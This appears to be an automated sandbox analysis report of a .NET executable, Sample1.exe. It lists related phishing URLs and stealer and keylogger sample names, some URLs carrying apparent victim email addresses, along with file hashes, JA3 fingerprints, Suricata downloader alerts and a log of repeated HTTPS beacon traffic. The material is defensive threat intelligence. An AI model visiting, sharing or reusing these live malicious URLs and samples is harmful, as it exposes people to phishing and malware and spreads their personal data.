	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q#support@sealevel.com	Get hash	malicious	HTMLPhisher	Browse	104.21.64.1
	https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	104.17.196.192
	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086	Get hash	malicious	Unknown	Browse	104.17.25.14
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
CLOUDFLARENETUS	https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q#support@sealevel.com	Get hash	malicious	HTMLPhisher	Browse	104.21.64.1
	https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	104.17.196.192
	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086	Get hash	malicious	Unknown	Browse	104.17.25.14
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
CLOUDFLARENETUS	https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q#support@sealevel.com	Get hash	malicious	HTMLPhisher	Browse	104.21.64.1
	https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	104.17.196.192
	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086	Get hash	malicious	Unknown	Browse	104.17.25.14
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
6a5d235ee78c6aede6a61448b4e9ff1e	Debh Payment Detail.html	Get hash	malicious	Unknown	Browse	162.159.130.233
	NoticeOfPayment.docx	Get hash	malicious	Unknown	Browse	162.159.130.233
	Absa Remittance Advice.docx	Get hash	malicious	Unknown	Browse	162.159.130.233
	Rev5_ Joint Declaration C5 GER_track changes.doc	Get hash	malicious	Unknown	Browse	162.159.130.233
	YYYY-NNN AUDIT DETAIL REPORT .docx	Get hash	malicious	Unknown	Browse	162.159.130.233
	3bSDIpSIdF.msi	Get hash	malicious	Unknown	Browse	162.159.130.233
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	162.159.130.233
	2M and OPS Cobot White Paper 01082025 TM CH (1).docx	Get hash	malicious	Unknown	Browse	162.159.130.233
	Setup.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	162.159.130.233

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.677687653335447
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Sample1.exe
File size:	8'192 bytes
MD5:	45a47d815f2291bc7fc0112d36aaad83
SHA1:	db1dc02b2d64c4c3db89b5df3124dd87d43059d5
SHA256:	416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f
SHA512:	a7d98145cf949a42ace2da725a22847ad814a28137d32b0b220430b91c89aabed7144b85f20c2fd9a1a02f5b92520bf5f0afbe8202028f9832cbc29c2a9e776e
SSDEEP:	96:gJOElmu1B9ilJJMOfEkdEKozt1ExQf8cqkTzNt:gLkJwGE3Eez1
TLSH:	72F1D506B7E90737DCBE4B7E98B3471053B2E7154D12CB1E58C8825E6CA27140EA2BB6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r..a.............................4... ...@....@.. ....................................@................................

File Icon


Icon Hash:	2086969696969600

Static PE Info

General

Entrypoint:	0x4034de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x611BC772 [Tue Aug 17 14:28:02 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x348c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14e4	0x1600	71accce4880151301c6683520f45fc07	False	0.5411931818181818	data	5.242023678463902	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x4d8	0x600	3b4c8babac32e70e40c87171057e73fb	False	0.373046875	data	3.7074957304627785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	1dac35429d587a58026a5138f17bfbfe	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x40a0	0x244	data			0.4706896551724138
RT_MANIFEST	0x42e8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T15:11:32.036088+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.25	49723	162.159.130.233	443	TCP
2025-01-15T15:13:19.348426+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.25	49747	162.159.130.233	443	TCP
2025-01-15T15:15:42.800221+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.25	49791	162.159.129.233	443	TCP
2025-01-15T15:15:48.409941+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.25	49792	162.159.129.233	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:11:25.597353935 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:25.597388983 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:25.597457886 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:25.616450071 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:25.616466045 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.076100111 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.076200962 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:26.080287933 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:26.080300093 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.080645084 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.134562016 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:26.138394117 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:26.179331064 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.247549057 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.247718096 CET	443	49722	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:26.247831106 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:26.377192974 CET	49722	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:31.389693022 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:31.389724016 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:31.389843941 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:31.390201092 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:31.390211105 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:31.881439924 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:31.883322954 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:31.883335114 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:32.036174059 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:32.036340952 CET	443	49723	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:32.036427021 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:32.036911964 CET	49723	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.042905092 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.043015957 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.043117046 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.043442965 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.043459892 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.507646084 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.509346008 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.509381056 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.637959003 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.638036013 CET	443	49724	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:37.638212919 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:37.638683081 CET	49724	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:42.651515007 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:42.651561975 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:42.651635885 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:42.651936054 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:42.651947021 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:43.142391920 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:43.143908024 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:43.143939972 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:43.304099083 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:43.304177999 CET	443	49726	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:43.304260015 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:43.304873943 CET	49726	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.307478905 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.307566881 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.307648897 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.307863951 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.307905912 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.784207106 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.785516024 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.785547018 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.922404051 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.922585964 CET	443	49727	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:48.922775030 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:48.923077106 CET	49727	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:53.933514118 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:53.933561087 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:53.933645010 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:53.933929920 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:53.933944941 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:54.388892889 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:54.390470028 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:54.390480995 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:54.586500883 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:54.586663008 CET	443	49729	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:54.586725950 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:54.587342978 CET	49729	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:59.592102051 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:59.592149973 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:11:59.592247009 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:59.592581987 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:11:59.592593908 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:00.089660883 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:00.091290951 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:00.091308117 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:00.310642004 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:00.310808897 CET	443	49732	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:00.310872078 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:00.311276913 CET	49732	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.323750019 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.323780060 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.323874950 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.324126005 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.324141979 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.797301054 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.798569918 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.798582077 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.936539888 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.936613083 CET	443	49733	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:05.936769009 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:05.937181950 CET	49733	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:10.948944092 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:10.948990107 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:10.949141979 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:10.949321985 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:10.949340105 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:11.403784990 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:11.405617952 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:11.405648947 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:11.546925068 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:11.546987057 CET	443	49734	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:11.547095060 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:11.547658920 CET	49734	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:16.560904980 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:16.560961008 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:16.561041117 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:16.561297894 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:16.561310053 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:17.055139065 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:17.091953993 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:17.092001915 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:17.201776981 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:17.201848030 CET	443	49735	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:17.201915979 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:17.204695940 CET	49735	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.214663982 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.214704990 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.214771986 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.214993000 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.214999914 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.688909054 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.690121889 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.690140009 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.847289085 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.847472906 CET	443	49737	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:22.847547054 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:22.848006964 CET	49737	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:27.855654001 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:27.855698109 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:27.855875969 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:27.856064081 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:27.856071949 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:28.314723969 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:28.316097021 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:28.316108942 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:28.500720024 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:28.500860929 CET	443	49738	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:28.501163006 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:28.501576900 CET	49738	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:33.514266014 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:33.514306068 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:33.514431953 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:33.514684916 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:33.514700890 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:33.969640017 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:33.970992088 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:33.971004009 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:34.123321056 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:34.123406887 CET	443	49739	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:34.123456955 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:34.123857021 CET	49739	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.137949944 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.138011932 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.138079882 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.138341904 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.138360977 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.604501963 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.616300106 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.616328001 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.768815994 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.768915892 CET	443	49740	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:39.769078970 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:39.780558109 CET	49740	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:44.795866013 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:44.795916080 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:44.795972109 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:44.796462059 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:44.796473026 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:45.257098913 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:45.258461952 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:45.258491993 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:45.435900927 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:45.435955048 CET	443	49741	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:45.436009884 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:45.436602116 CET	49741	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:50.453190088 CET	49742	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:50.453252077 CET	443	49742	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:50.453394890 CET	49742	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:50.453594923 CET	49742	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:50.453623056 CET	443	49742	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:50.915057898 CET	443	49742	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:50.916389942 CET	49742	443	192.168.2.25	162.159.130.233
Jan 15, 2025 15:12:50.916419983 CET	443	49742	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:51.073522091 CET	443	49742	162.159.130.233	192.168.2.25
Jan 15, 2025 15:12:51.073587894 CET	443	49742	162.159.130.233	192.168.2.25
